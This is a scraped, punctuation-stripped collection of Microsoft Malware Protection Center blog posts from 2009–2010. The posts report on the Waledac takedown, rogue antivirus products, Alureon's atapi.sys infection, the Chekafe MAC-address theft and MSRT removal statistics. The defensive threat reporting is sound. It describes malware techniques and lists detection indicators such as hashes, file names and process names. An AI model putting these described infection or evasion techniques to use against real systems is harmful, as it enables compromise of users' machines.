the MSRT has reported since January this year Win32 Rimecud distribution per country region according to MSRT The Mariposa botnet criminals also used Win32 Rimecud to further compromise controlled computers by installing additional malware In reality, this was likely to include several different malware families, but it's been reported that Rimecud may at least have been used to download and install Win32 Tofsee Microsoft antimalware products such as Microsoft Security Essentials detects this threat Many thanks to my colleagues Patrick, Jimmy, and Joe for their insights on the threat event Scott Wu -- MMPC IMAGE http://www.secuobs.com/revue/news/198144.shtmlhttp://www.secuobs.com/revue/news/198144.shtml Secuobs.com : 2010-03-02 19:01:35 - Microsoft Malware Protection Center - By now you have likely seen multiple reports of Operation b49 which has targeted the Win32 Waledac botnet s command and control infrastructure As I mentioned in my last blog there is still more work that needs to be done in terms of cleaning up infected systems Of course, Win32 Waledac is not the only botnet even though we have taken positive steps in an attempt to neutralize this family of malicious software, there is still a need for additional action and cross-industry cooperation to combat these threats to Internet safety It is interesting to observe the distribution of Waledac when considering the risk it may represent to your organization as it differs significantly from previous heat maps that show the infection rates of all threats combined There is a significantly higher degree of infection in the US and Europe as well as moderately high infection rates in Australia, Brazil, and Canada than we see in China, Japan and other parts of the Pacific Rim IMAGE The scale shown in the heat map above is relative to itself and should not be taken to connote one country is safer than another since we are only displaying data about Win32 Waledac and not all threats The scale in the bottom left corner ranges in infection rate from less than one computer per 100,000 to 26 computers per 100,000 These figures are well below the computers cleaned per thousand CCM metric for every country we discuss in the Security Intelligence Report we are cleaning on the order of tens of millions of infected computers in a given year In the period from January 2009 through the end of February 2010 we have removed this threat from 182,340 computers some of which were infected at more than one time or with more than one version of the threat table Since Win32 Waledac is distributed through email generally with a lure based on a current holiday or other topical news item, a varied distribution is expected It is also important to note that the number of computers infected is not the only aspect of the impact a threat can have This threat has also been responsible for significant levels of spam Estimates show the capacity of spam Waledac could deliver to be 15 billion messages per day more than 651 million attempted connection attempts were made to Hotmail between December 3 and December 21, 2009 each of which would be capable of delivering hundreds or even thousands of unsolicited email Additionally, the impact of credential theft, theft of email addresses in an infected computer s address book and other risks compound the damage this threat is able to do As we have reported in our Security Intelligence Reports there has been an increase in botnet disinfections period over period as is illustrated in the chart below Botnets vary widely in capability but generally are used by criminals for the distribution of malicious software, sending large volumes of spam, distributed denial of service attacks, theft of passwords and personal information as well as to maintain a foothold on a large number of computers for future use either directly or in a pay-for-service model through the underground economy IMAGE Scott Charney will be discussing these threats, Operation b49 and more in his keynote today at RSA Additionally, I will be speaking on this in more detail on botnets in general and Waledac specifically in the Microsoft Theater in the Expo hall at noon I hope to see you there as well as in the panel discussion at 1pm in Orange Room 307 SIP-106 where Andrew Jacquith of Forrester Research will lead us in a lively discussion of Security Intelligence Reporting You can also find more information on our efforts towards end to end trust and how we aspire to a safer, more trusted Internet here As crime on the Internet evolves in complexity and volume, we must fight these threats more creatively and aggressively- both directly and through cross-industry partnerships- to make the Internet safer for all of us --Jeff Williams IMAGE http://www.secuobs.com/revue/news/197199.shtmlhttp://www.secuobs.com/revue/news/197199.shtml Secuobs.com : 2010-02-25 22:18:34 - Microsoft Malware Protection Center - Today, you may have read in the Wall Street Journal about an operation Microsoft has been conducting against the Win32 Waledac botnet If you haven t already seen the article, you can find additional information in the Microsoft on the Issues blog In summary, the Microsoft Digital Crimes Unit with support from the Microsoft Malware Protection Center has taken legal and technical steps in an attempt to disable the command and control infrastructure of Waledac in order to prevent the criminals responsible from issuing new instructions Win32 Waledac is used, primarily, to send spam It also has the ability to download and execute arbitrary files, harvest email addresses from the local machine, perform denial of service attacks, proxy network traffic and steal passwords The impact posed by such an infection is, as a result, quite broad The method used for this takedown activity is rather novel and involves both legal and technical aspects On Monday, Microsoft filed a complaint in the US Eastern Court of Virginia and the court granted a temporary restraining order against 277 domains believed to be associated with Waledac and under the control of the criminals responsible With this TRO we have been able to suspend these domains from the Internet and, as a byproduct of this suspension, impact the ability for the criminal operators of the botnet to issue new commands or updates Additional technical measures are being employed to further reduce peer to peer communications and we are working with the security community to mitigate and respond to this botnet While the disruption of the command and control of Waledac is a positive thing, this does not- by itself- address the tens of thousands of computers which are still infected with the threat which are estimated to have been responsible for as many as 15 billion spam messages per day As we have previously reported in our most recent Security Intelligence Report covering the second half of 2009, Microsoft technologies such as the Malicious Software Removal Tool and Microsoft Security Essentials were used to remove more than 96,000 instances of this threat- making it the 11th most prevalent during that period As we have in the past we encourage our customers to run an up to date anti-virus program from a trusted source and to stay up to date with security updates from Microsoft using Automatic Update as well as staying up to date on third party software If you are not already running up to date anti-virus, we would ask that you do this now to assist in containing this- and other- threats We re not done Stay tuned -- Jeff Williams IMAGE http://www.secuobs.com/revue/news/195692.shtmlhttp://www.secuobs.com/revue/news/195692.shtml Secuobs.com : 2010-02-25 09:57:47 - Microsoft Malware Protection Center - Well, it had to happen eventually One of the oldest tricks used by rogue antivirus products is to use a similar name as, or have a similar look and feel to, legitimate security software It s been commonplace for them to mimic the Windows Security Center So it was inevitable that the day would arrive when a rogue would masquerade as something similar to Microsoft Security Essentials If anything, it surprises me a little that it s taken so long This one calls itself Security Essentials 2010 and looks something like this Fke scanning interface displayed by Win32 Fakeinit For the record, this is how the real Microsoft Security Essentials appears when it has detected a threat in this case, Win32 Fakeinit Real Microsoft Security Essentials scanning interface As we in the MMPC have always been quick to point out, Microsoft Security Essentials can be downloaded and used without charge by users running genuine Windows from here http wwwmicrosoftcom security_essentials So anything mimicking Microsoft Security Essentials but asking for any sort of payment is clearly Up To No Good Activation dialog displayed by Win32 Fakeinit We detect this imposter as Trojan Win32 Fakeinit Fakeinit s downloader not only installs the fake scanner component it also monitors other running processes and attempts to terminate the ones it doesn t like, claiming that they are infected Fake warning alert displayed by Win32 Fakeinit You can see a list of some of the terminated processes in the TrojanDownloader Win32 Fakeinit description Aside from this, it lowers a number of security settings in the registry, and changes the desktop background to display the following rather alarming message Desktop background set by Win32 Fakeinit It also modifies the registry in an attempt to prevent this background from being changed again Furthermore, it also downloads and installs a Win32 Alureon component, and another Layered Service Provider LSP component, also detected as Trojan Win32 Fakeinit This LSP monitors the TCP traffic sent by various Web browsers that the user might have installed, and blocks any traffic to certain domains, instead displaying the following Message displayed by Win32 Fakeinit when affected user attempts to visit a specified domain You can find a list of some of the blocked domains in the Trojan Win32 Fakeinit description - David Wood IMAGE http://www.secuobs.com/revue/news/195467.shtmlhttp://www.secuobs.com/revue/news/195467.shtml Secuobs.com : 2010-02-22 06:10:36 - Microsoft Malware Protection Center - With the Winter Olympics in the news for the past couple of weeks, malware profiteers, as usual, are hard at work churning their little greased wheels , looking to capitalize on any opportunity to get the slightest hint of public attention Their strategy is simple populate a malicious Web page with keywords that are likely to come up in news-related searches The sooner such a page can be put up, the better chance it has of getting a high search engine ranking Even though normally there aren't that many links to such pages from other sources, the fact that it has been published early enough might promise its placement in the top search results returned In addition, while the large number of sources covering the event would normally put the malicious page below search engine rankings, malware writers aim for a spike in the news activity, which narrows down the number of keywords from a larger, already popular set An example of a Winter Olympic Games subset could be gold medal short track skating or something similar The high ranking for the malicious page may be short lived but sometimes it can linger up in the charts for days That lingering popularity can be attributed to an early detection of the malware served by the page, which then references the page as a malicious source in security forums or other security related sites It happens that some of the sites link to the malicious page, inadvertently helping its popularity This is one reason why we do not publish URLs to malicious pages and why elsewhere you often see contrived or deliberately broken URLs that might suggest, but not give access to the page being discussed I stumbled on one such example that persistently seemed to appear when the link is clicked, the attention of the user is drawn to somewhat typical scare tactics IMAGE Regardless of the response, the page navigates to a fake representation of what appears to be a user s hard drive, seemingly infected with various sorts of malware IMAGE Once again regardless of the response, the user is prompted with a diaolog to download a binary file IMAGE The binary itself SHA1 e753a343ea58a4303ec259f2a971db3a508dd6a6 is detected as Trojan Win32 Winwebsec by the latest Microsoft antivirus signatures So far there does not seem to be an easy solution to dealing with malicious pages popping up related to recent popular news search keywords So as usual, stay vigilant to any suggestions to run an executable from an unverified source, and make sure that you use up to date antivirus definitions files -Oleg Petrovsky IMAGE http://www.secuobs.com/revue/news/194032.shtmlhttp://www.secuobs.com/revue/news/194032.shtml Secuobs.com : 2010-02-18 05:49:16 - Microsoft Malware Protection Center - The Win32 Alureon family of malware is a complex set of components which perform various functions These include the modification of DNS settings, search hijacking, and click fraud Alureon has existed for several years and has undergone a number of evolutionary changes The ability to infect the miniport driver associated with the hard disk of the operating system is a recent notable change This functionality first appeared around August 2009 For the most common system configuration for machines using ATA hard disk drives , the ATA miniport driver atapisys is the file which is targeted While the concept of modifying Windows system files as part of an installation method is not new, it is not a common approach The file modification performed by Alureon overwrites the data in the target driver s resource section with its own code The entry point of the driver is modified to point to this code By doing so, the malicious code is executed when the driver is loaded by the operating system Note that this infection method is mitigated on the 64-bit versions of Windows from XP SP1 onwards because of a technology called Kernel Patch Protection PatchGuard In order to invoke a given Windows API, the virtual address VA must first be determined This determination is generally taken care of by the operating system when an executable is loaded The information required to perform this operation is stored within the PE file itself However, malware and other software often employ other methods to achieve this In this case, rather than manipulate the structures required by the operating system, Alureon resolves the addresses it requires manually These are then stored as relative virtual addresses RVA within the body of the modified driver The figure below illustrates the code responsible for saving the RVA of the API ExAllocatePool at an offset relative 0x14 to the start of the resource section IMAGE The figure below is the start of the resource section of an infected driver The stored RVA is 0x38d66 IMAGE Inspecting the VA, which is calculated by adding the RVA to the image base of the kernel, we observe the start of the API, ExAllocatePool IMAGE As part of the February security updates, an update MS10-015 resolving a vulnerability in Windows Kernel was released This update included a new operating system kernel Inspecting the updated kernel at the same VA, we observe that this address no longer corresponds to the start of the ExAllocatePool API IMAGE In the updated kernel, the VA of ExAllocatePool has changed Therefore, after applying MS10-015, Alureon will now be attempting to make an invalid call The result of this attempted call is a blue screen or potential startup hang on 32-bit Windows systems but reports have predominately been on Windows XP The author s of Alureon have since updated the driver infection routine The latest version of Alureon detected as Trojan WinNT AlureonG no longer relies on the use of hard-coded RVAs Restart issues can be resolved by replacing an infected driver with the original This can be performed from the recovery console The top ten filenames reported in the wild atapisys iaStorsys nvatasys nvstor32sys nvstorsys nvgtssys nvatabussys SiSRaidsys IdeChnDrsys iastorvsys For example atapisys resides at the following location pourcentswindirpourcents system32 drivers atapisys --Scott Molenkamp IMAGE http://www.secuobs.com/revue/news/193071.shtmlhttp://www.secuobs.com/revue/news/193071.shtml Secuobs.com : 2010-02-11 03:07:10 - Microsoft Malware Protection Center - It's just a few more days before Valentine's Day As most people now are already preparing their celebration, malware authors are also getting ready to use this popular event to target users with their malicious intent Here's one example of a malicious file 2077ed17f0ad92dafb8fb7601570e06580e4b7f1 we've seen recently Upon execution, it drops the following picture file greeting IMAGE Note It seems that the malware writers are using valid images from legitimate Web sites Cute isn t it However, it does not just drop that Valentine related greeting, it also drops and executes the following file 82exe - detected as Backdoor Win32 BifroseAE Backdoor Win32 Bifrose is a family of backdoor Trojans that allows a remote attacker to access a compromised computer It usually drops a copy of the backdoor on the following folder bifrost and it also creates the following registry entries HKLM SOFTWARE Bifrost HKCU SOFTWARE Bifrost You can get more infromation about Backdoor Win32 BifroseAE in our encylopedia entry here Please be very cautious in searching for those Valentine greetings from the Internet or opening greeting cards even from your loved ones You would want Cupid to strike your heart and not your computer Advanced Happy Valentines Day Everyone --Elda Francis IMAGE http://www.secuobs.com/revue/news/190762.shtmlhttp://www.secuobs.com/revue/news/190762.shtml Secuobs.com : 2010-02-09 22:21:02 - Microsoft Malware Protection Center - This month we add another bot family to MSRT Win32 Pushbot Pushbot is, in many ways, an old school bot It is controlled through IRC, it can distribute itself through several different channels and its source code is more or less open for those who mix in certain circles Like Win32 Rbot, Pushbot isn t one piece of malware that is updated and maintained by one group of malware writers, but rather a collection of malicious programs created by different people based on a common base of source code The core code of Pushbot is based on something called Reptile, which dates back to 2005 Reptile, in turn, appears to have been based Win32 Sdbot, just as Win32 Rbot was Because they are created and released by different people, the functionality can vary from one instance to the next however, the basic features are universal They are all IRC bots at heart, although each may be controlled through a different IRC server They all spread in one way or another Spreading via instant messaging applications such as AIM and Windows Live Messenger was one of the defining features of the Pushbot family, but many recent variants have this functionality disabled, ie the code is present in the malware, but never executed Like other recent MSRT additions Hamweq and Rimecud, current Pushbots copy themselves to removable drives along with an autoruninf file to attempt to launch the malware when the drive is connected to another machine As David mentioned in his Hamweq blog, Windows 7 effectively ignores autoruninf entries for removable drives apart from CDs and DVDs Follow these instructions to update earlier versions of Windows to behave the same way Pushbot s raison d'être is the same as most bots to control as many machines as possible This control is mostly exploited by instructing infected machines to download other malware, which could be anything from password stealers to rogue security software Some Pushbot variants can also be commanded to steal password information themselves, or launch distributed denial of service attacks -Hamish O Dea IMAGE http://www.secuobs.com/revue/news/190190.shtmlhttp://www.secuobs.com/revue/news/190190.shtml Secuobs.com : 2010-02-08 05:35:43 - Microsoft Malware Protection Center - In a previous blog, I mentioned a family of malware named Dogrobot, which attempts to penetrate the protection offered by particular hardware that is widely used in Internet cafés in China Interestingly, we recently discovered a trojan, TrojanDownloader Win32 ChekafeA, that checks whether an affected machine is in an Internet café or not If the affected machine is not from an Internet café , it sends the MAC address of the affected machine to a remote server Leading me to ask two questions How does it check if the affected host is in an Internet café or not Why does it require this particular information For the first question, the answer is very simple The malware checks for the presence of the following processes BarClientViewexe Barclientexe EWayexe NBClientexe NxpAuxSvcexe clsmnexe mzdclientexe These processes are related to popular administration software used in Internet cafés in China If any of these processes are found, obviously, the affected system is most likely from an Internet café Now, the second question, why does it check for this I pondered this for a while until I further investigated the samples that Chekafe downloads I found most of the downloaded samples were password stealing trojans, including PWS Win32 LolydaAU, PWS Win32 OnLineGamesFR, and PWS Win32 OnLineGamesGP Combined with the fact that it is sending the MAC address information, I realized that this kind of checking may be related to attempts to defeat an account protection mechanism -- MAC address binding Some popular online games offer the user MAC binding protection - the account can only be logged in from a certain computer with a unique MAC address If the affected machine is from an Internet café, most likely the user won t enable the MAC address binding for the account since they may not always use the same machine Otherwise, Win32 ChekafeA sends the MAC address information so they can forge the same MAC address to bypass MAC address binding protection -Chun Feng IMAGE http://www.secuobs.com/revue/news/189503.shtmlhttp://www.secuobs.com/revue/news/189503.shtml Secuobs.com : 2010-01-19 21:14:53 - Microsoft Malware Protection Center - If you remember our MSRT related blog from few days ago and if not just scroll down a bit , we informed you that in this month s free removal tool we would be adding Win32 Rimecud to our list of prevalent malware targeted for removal We even speculated about a possible connection between it and last month s addition, Win32 Hamweq This led us to belief that, given the high detection rate of Win32 Hamweq, we would have a new leader for January s run of the removal tool Not to our surprise, this actually happened Take a look at our 3-day-run top 20 families chart Position Machine Count Family Notes 1 488,090 Rimecud Worm targeting removable drives and instant messaging with backdoor functionality 2 274,678 Hamweq Worm targeting removable drives, and IRC controlled backdoor 3 237,158 Taterf Worm targeting network removable drives, and online game PWS 4 169,562 Renos Rogue antivirus downloader 5 124,572 Alureon Data stealing malware that changes DNS settings 6 116,466 Conficker Network worm and malware downloader 7 90,586 Bredolab Downloader of numerous malware components 8 85,777 Bancos Password Stealer targeting predominantly Brazilian banks 9 85,534 FakeSpypro Rogue antivirus 10 85,018 FakeXPA Rogue antivirus 11 68,942 Yektel Rogue antivirus component related to FakeXPA 12 62,250 IRCbot IRC controlled backdoor 13 61,602 Cutwail Multiple component downloader and spammer 14 45,972 Brontok Mass emailing worm 15 39,820 Frethog Online game password stealer related to Taterf 16 36,637 PrivacyCenter Rogue antivirus 17 25,931 Winwebsec Rogue antivirus 18 24,795 Parite File infecting virus 19 24,588 Jeefo File infecting virus 20 24,207 FakeVimes Rogue antivirus According to the table above, first-ranked Win32 Rimecud had almost twice as many removals as second-ranked Win32 Hamweq Below is a chart of top ten locales where Rimecud was found and cleaned IMAGE From the table you can also notice that Taterf and Renos maintain a high profile while Conficker dropped in numbers slightly Another family that declined in removals this month is Cutwail, from 6th to 13th position As usual, rogues are also present with FakeSpypro maintaining the 9th position as in December s report, while FakeXPA dropped in removal numbers from 5th to 10th place As an important note, we see PrivacyCenter as 16th in the list it wasn't even a top family last month , ahead of Winwebsec, which had a moderate increase in numbers Please keep protecting yourself by running Microsoft Security Essentials, or any other reputable antivirus solution Marian Radu MMPC Dublin IMAGE http://www.secuobs.com/revue/news/183211.shtmlhttp://www.secuobs.com/revue/news/183211.shtml Secuobs.com : 2010-01-13 01:46:15 - Microsoft Malware Protection Center - Following the addition of Win32 Hamweq to the MSRT last month, MMPC will continue cleaning PCs in 2010 by adding another prevalent worm, Win32 Rimecud, to this month's removal tool This is due not only to Win32 Rimecud's high detection numbers, which immediately follow those of Win32 Hamweq, but also to the similarities the two families share with each other In fact, as part of its payload, Win32 Hamweq may download Win32 Rimecud, contributing to Rimecud's suitability as the next target for MSRT Win32 Rimecud is a family of worms that spreads via fixed and removable drives, instant messaging programs, and P2P networks Similar to Hamweq, it also contains backdoor functionality that allows unauthorized access to affected machines However, compared to Hamweq, Win32 Rimecud's backdoor supports a more diverse and sophisticated set of commands, giving the remote attacker greater control of the compromised machine Win32 Rimecud uses a variety of obfuscators to hinder detection These are written in C C Delphi Visual Basic and usually have virtual environment detection and anti-emulation tricks to make the malware harder to detect Other similarities to Win32 Hamweq's behavior include using the Recycle Bin as the target drop folder for copies of itself, injecting code into the explorerexe process and the capability to spread via removable drives By looking at the similarities between the two threats we could speculate that they were created by the same author s Like they say Birds of a feather For more technical details about Win32 Rimecud please check our encyclopedia description here -Marian Radu IMAGE http://www.secuobs.com/revue/news/180908.shtmlhttp://www.secuobs.com/revue/news/180908.shtml Secuobs.com : 2010-01-07 21:51:21 - Microsoft Malware Protection Center - Getting hit by a live rootkit infection is among the more unfortunate fates that can befall an unsuspecting computer user A rootkit burrows deep into the system, modifying it at a low-level in order to hide itself and other malware, and from there fights off attempts at deactivation and removal While real-time protection can block the rootkit from becoming active to begin with, if the computer is already infected by a rootkit, things get more interesting Antimalware technologies must use sophisticated techniques to scan for and detect, and finally to remove, a lurking rootkit In reviewing the telemetry we receive from some of our antirootkit-related features, a few interesting things stand out How big is the rootkit problem ------------------------------- Of all infections reported from client machines, low-level rootkits represent about 7pourcents of infections Of course, measuring the prevalence of rootkits is not entirely straightforward by definition rootkits do everything they can to remain unseen When we added some additional checks to our default scheduled scan to look for files that are hidden from Windows API calls, some threats that had appeared relatively benign suddenly revealed that they had moved to using a rootkit to try and avoid detection Worst of the worst ------------------ In terms of the most prevalent rootkits we see in the wild, the Alureon family wins hands-down, accounting for more than 60pourcents of total rootkit reports You can learn more about these top families in the Malware Encyclopedia Alureon Cutwail Rustock Hupigon Rootkitdrv Mader Srizbi Vanti Omexo Haxdoor Bagle Xantvi Sinowal Protmin Emold This list includes threats that tried to run and were blocked by real-time protection If we look at threats that had files detected as being actively hidden on disk from Windows, we get a somewhat different picture Rustock Bagle Srizbi Mitglieder Zbot Sdbot Almanahe Cutwail NTRootkit Frethog Obfuscator Rootkitdrv Alureon AproposMedia Festi Rootkits in their natual habitat -------------------------------- Rootkits tend to hide their malicious binaries on disk in predetermined locations Here are the most popular locations we see hidden rootkit binaries living on the hard disk Rank Location Example 1 pourcentssystempourcents drivers c windows system32 drivers 2 user temp c Users username AppData Local Temp 3 pourcentssystempourcents c windows system32 4 system drive root c 5 windows temp c windows temp 6 pourcentswindowspourcents c windows 7 install folder location installer was run from Windows may not show anything unusual in these locations, but a more thorough antirootkit scan can shine a light on the hidden rootkit threats and take appropriate action Hidden file types ----------------- In terms of the type of file being hidden on user's computers, drivers come out on top Since most rootkits use a kernel-mode driver, this is not surprising Type pourcents of rootkit threats SYS 59pourcents EXE 40pourcents DLL 1pourcents Kernel-health screening ----------------------- Currently the most common technique for a rootkit to get active and start hiding on a computer is to modify the Windows OS kernel When we examine the kernel on computers running our full antimalware client to look for signs of tampering by rootkits, we notice that a disconcerting number of computers are not running with a healthy kernel Here's a sample of report volume showing computers that have had their Windows kernel altered, across a recent consecutive 10-day period That's about 1 in 100 computers Digging into the results, we see that a lot of software is modifying the Windows kernel for various reasons While much of this software is not specifically malicious, modifying the kernel can lead to system instability as well as make it easier for rootkits to hide If the kernel is already hooked by a legitimate program, the rootkit can hook at the next level, making it more difficult to trace the hook chain to the malicious code An unspoiled landscape ---------------------- As Joe pointed out in his recent post on the 64-bit malware landscape, running 64-bit Windows offers even more protection for customers For the rootkit space, the difference between 64-bit and 32-bit is even more pronounced In fact, it's likely that an even smaller percentage of the reported rootkit threats from 64-bit computers were actually able to successfully become active and hide anything Enforced driver signing and features such as Kernel Patch Protection make 64-bit Windows a much more hostile environment for rootkits Parting thoughts ---------------- We expect that malware authors will continue to seek ways to fly under the radar, just as we will continue to evolve our protection technologies to stay one step ahead of the bad guys Regardless, here are a couple tips to avoid getting hit by a rootkit Keep real-time protection enabled while running up-to-date antimalware software is essential, it does little good if you turn off the real-time protection feature If you lower your defenses and a rootkit does get through, finding and removing it can be a tricky endeavor Keep your defenses up and you're much less likely to have headaches down the road Run 64-bit Windows for the time being, it appears that currently, users running 64 bit Windows are less likely to be compromised by rootkits While the threat landscape is constantly evolving, for now you can breathe a lot easier if you're running 64-bit Windows If you have a choice, go with 64-bit Regards, -Randy Treit IMAGE http://www.secuobs.com/revue/news/179315.shtmlhttp://www.secuobs.com/revue/news/179315.shtml Secuobs.com : 2009-12-19 03:22:08 - Microsoft Malware Protection Center - Earlier in 2009, the Microsoft privacy homepage became the target of rogue security software developers looking to make a fast buck The developers of the rogue security application known as Privacy Center even went so far as to include a link to Microsoft to trick users into thinking the rogue is a Microsoft product Trojan Win32 PrivacyCenter is a family of programs that claims to scan for malware and displays fake warnings of malicious programs and viruses They then inform the user that they need to pay money to register the software in order to remove these non-existent threats We have received reports that this trojan has been distributed via poisoned search results, where users are redirected to sites that display fake scanners These pages mistakenly report that the user's system is infected in order to convince users to download Trojan Win32 PrivacyCenter We have also received reports that this trojan has been distributed masquerading as a fake video codec The pages and files utilized in this form of attack are highly variable, and change according to the user's location, browser and operating system Below is a screenshot of the rogue program Win32-PrivacyCenter 1 Reports of rogue security programs have been more prevalent as of late These are programs that generate misleading alerts and false detections in order to convince users to purchase illegitimate security software Some of these programs may display product names or logos in an apparent and unlawful attempt to impersonate Microsoft products Use Microsoft Security Essentials, Microsoft Windows Defender, the Windows Live safety scanner http onecarelivecom site en-us defaulthtm , or another up-to-date scanning and removal tool to detect and remove these threats and other unwanted software from your computer For more information on Microsoft security products, see http wwwmicrosoftcom protect products computer defaultmspx -- Regards, Patrick Nolan IMAGE http://www.secuobs.com/revue/news/174182.shtmlhttp://www.secuobs.com/revue/news/174182.shtml Secuobs.com : 2009-12-17 07:03:06 - Microsoft Malware Protection Center - In the week since its release on December 8, MSRT has cleaned over 25 million machines of malware The new family for December was Win32 Hamweq, an IRC controlled backdoor which spreads via removable drives Hamweq was removed from 638,491 machines, making it the most prevalent family for the month, with around double the number of removals of Win32 Taterf, the next most prevalent family Taterf, which is perennially one of the highest reported families by MSRT, also had more than twice the number of removals of the third most prevalent family Listed below are some of the families with high numbers of removals for this month Machines Cleaned Family Name Notes 638491 Hamweq Worm targeting removable drives, and IRC controlled backdoor 319998 Taterf Worm targeting network removable drives, and online game PWS 156549 Conficker Network worm and malware downloader 104577 Renos Rogue antivirus downloader 100050 FakeXPA Rogue antivirus 98725 Cutwail Multiple component downloader and spammer 90472 Alureon Data stealing malware that changes DNS settings 72231 Frethog Online game password stealer related to Taterf 62394 Bancos Password Stealer targeting predominantly Brazilian banks 60109 FakeSpypro Rogue antivirus 57645 Yektel Rogue antivirus component related to FakeXPA 54908 Brontok Mass emailing worm 51150 Koobface Multiple component worm targeting social networking sites 43035 Bredolab Downloader of numerous malware components 34029 Parite File infecting virus 31441 IRCbot IRC controlled backdoor 30400 Jeefo File infecting virus 27964 Virut File infecting virus with IRC controlled backdoor 24361 Zlob Multiple component malware family that downloads arbitrary files 24057 RJump Worm targeting removable drives 23950 Banker Password Stealer targeting predominantly Brazilian banks 23377 Banload Downloader of bank password stealers 22462 FakeVimes Rogue antivirus 20564 Rustock Rootkit enabled backdoor used to assist with sending of spam 19294 Vundo Adware downloader 15814 Winwebsec Rogue antivirus Hamweq was prevalent across a wide range of locales worldwide of the 199 locales where MSRT reported cleaning at least one system, 185 of them reported cleaning a Hamweq infection Wherever a locale reported high numbers of machines cleaned of malware, reports of Hamweq were also generally high The main exception to this was Chinese speaking countries, where reports were dominated by online game password stealing malware such as Taterf, Frethog, and Lolyda Locale Machines cleaned All Malware Locale Machines Cleaned Hamweq United States 644025 United States 155142 Brazil 171414 Spain 94888 Korea 156985 Brazil 41692 Spain 167575 Mexico 37771 France 79493 Korea 35874 Mexico 66904 Poland 25985 United Kingdom 63557 Portugal 23323 Taiwan 62616 France 18607 Poland 61817 Russia 15505 Turkey 57972 United Kingdom 13414 China 50730 Italy 9520 Russia 47467 Chile 8104 Italy 45362 Turkey 6818 Portugal 45210 South Africa 6554 Japan 43274 Australia 5979 Germany 39498 Germany 5853 Australia 19124 Colombia 5707 Netherlands 17830 Japan 5351 Chile 13710 Israel 4326 Canada 12678 Argentina 3622 December s MSRT release also saw a significant drop in the number of reports for Win32 FakeScanti, a rogue antivirus that was added to MSRT in October At the corresponding period in October, FakeScanti was the 12th most prevalent family, with removals from 56,700 machines Shortly afterwards, FakeScanti s authors stopped modifying the rogue to avoid detection by antivirus products, and as a result, we have not needed to add a signature for FakeScanti since October 26 In November, FakeScanti was the 23rd most prevalent family with 20,222 removals, whilst by December it had dropped to 49th with 1595 removals While FakeScanti s authors may have moved their focus to developing other malware, the rogue can still be downloaded, and we have since seen other malware that installs FakeScanti on to affected systems Similarly, Win32 FakeSecSen, which was the very first rogue we added to MSRT in November 2008, can still be downloaded even though it has not been updated since later that month, and is still being cleaned in small numbers by MSRT over a year later This month FakeSecSen was the 54th most prevalent family with 1031 removals The fact that these rogues distributors find it worthwhile to continue to host malware that would be detected by most antivirus products shows that unprotected systems are still a rich target for those who would use them for profit, or for other nefarious activities As usual, we recommend protecting yourself by running Microsoft Security Essentials, or any other reputable antivirus solution David Wood MMPC Melbourne IMAGE http://www.secuobs.com/revue/news/173269.shtmlhttp://www.secuobs.com/revue/news/173269.shtml Secuobs.com : 2009-12-11 01:58:10 - Microsoft Malware Protection Center - it might be because you weren't meant to Last year, the EOF virus-writing group decided to release a virus zine with the help of DoomRiderz and rRlf Well, here is how that turned out rRlf backed out of the project at the last minute and then folded, and DoomRiderz folded shortly after the zine was released The zine itself contained some buggy contributions, and the majority of them were extremely primitive The only new techniques came from the oldest of the virus writers One of those techniques was an unusual use of a CPU instruction, and the others were file-format tricks They were certainly techniques that we weren't expecting to see, but nothing that our engines couldn't handle already There were some other interesting samples, too, though the reasons for their being interesting are varied It was mostly because we identified numerous bugs in each sample see, for example, Win32 Harumf One of them was interesting for the extent in which it attempted to be anti-heuristic Win Zekneol One of them was interesting because it was a collection of old routines Win Satevis None of them were a problem for our engines, though It's been more than a year since I started describing these samples in the Virus Bulletin journal I've almost finished with the set, and perhaps just in time to start a new one it seems that the EOF is at it again, only this time with a different group VirusTech is a Russian group that announced the joint venture, but then went completely silent on the subject Who knows if they will release anything this year As far as the proof-of-concept authors saving the virus scene, that didn't happen, either The virus writer known as herm1t did his thing with the file format tricks, but the virus code is still easy to reach and easy to scan Of course, this wasn't the purpose of the demonstration contrast that with his earlier Linux Crimea virus family, whose code was not easy to reach, and which clearly was the purpose of the demonstration We had two variants of a virus that overwrites the noteABI-tag section, four variants of a virus that overwrites in different ways the hash section, a virus that adjusts the segment alignment, and a virus that overwrites the Procedure Linkage Table It seems that he has run out of things to do with the file, at least for now These viruses are especially interesting because they are exploiting aspects of a file format that has no equivalent in Windows It also shows that Linux and other Unix-based platforms you know which ones I mean are not immune to viruses After almost an entire year of silence, the virus writer known as roy g biv returned to the scene with some text files His two new techniques, Subtle SEH and Heaven's Gate are certainly new and different, but also a coding dead-end While the subtle registering of SEH might fool a human, these days it's all about the emulator, and the emulator is not fooled Heaven's Gate is even less of a problem, in a sense - it is using a gate to jump from a 32-bit environment into a 64-bit environment, assuming that the processor and operating system support it I suppose that eventually we will see a virus that uses the technique, but if our emulator decides to not support that, then it simply won't run This situation is much like the use of SSE42 instructions that I described in The Power Of SSE Oh, I mustn't forget to mention the virus for ODBGScript that is apparently by him, but I'm sure that the question on everyone's lips is - is it really him Okay, maybe not everyone's lips At least some people will be asking Do I care Most recently was the release of a Hiew plugin virus for Hiew It infects the file that Hiew is examining SPTH is also back after his retro detour of DOS virus material, and this time it's polymorphic fun with linear algebra Of course, it doesn't matter how variable the polymorphic part is, if the rest of it is constant, and that's what we have here A huge, enormous, gigantic, colossal constant decryptor, followed by a huge, enormous, gigantic, colossal polymorphic representation of the body The only reason that it's polymorphic is because it's all text It's a script virus Keeping it simple is just one step away from retiring again We're happy about that development One other development is from one of the newer members Dark Prophet He has apparently written a polymorphic, anti-heuristic, and anti-emulating virus that well, I'll get to it eventually, but a quick glance has already shown me one serious bug I've even received a request to describe it How nice I hope that it's because they think that I'll do a good job with it So that's the news in brief - Peter Ferrie with apologies to Roger Hargreaves and his Mr Greedy story IMAGE http://www.secuobs.com/revue/news/170790.shtmlhttp://www.secuobs.com/revue/news/170790.shtml Secuobs.com : 2009-12-08 22:52:47 - Microsoft Malware Protection Center - This month, Worm Win32 Hamweq has been added to the Malicious Software Removal Tool MSRT in time for the holidays Hamweq makes it on to MSRT s naughty list as an IRC-controlled backdoor that spreads via removable drives It has multiple means of hiding its presence it installs itself into a hidden directory which it disguises as a recycle bin, and, once run, it injects various code sections, and separately injects each of the encrypted strings it uses, into the explorerexe process This means it will not be shown separately on any list of running processes, and may also give it network access through any firewall that might be installed Hamweq periodically checks whether a removable drive has been attached, and if so, will copy itself to that drive, again using a directory that it disguises as a recycle bin It also creates an autoruninf file on the drive, containing an option to Open folder to view files This means that when the drive is subsequently attached to another system, the autoplay dialog will display two options that have this description One of these will display the drive in Windows Explorer, whilst the other will run the malware If the 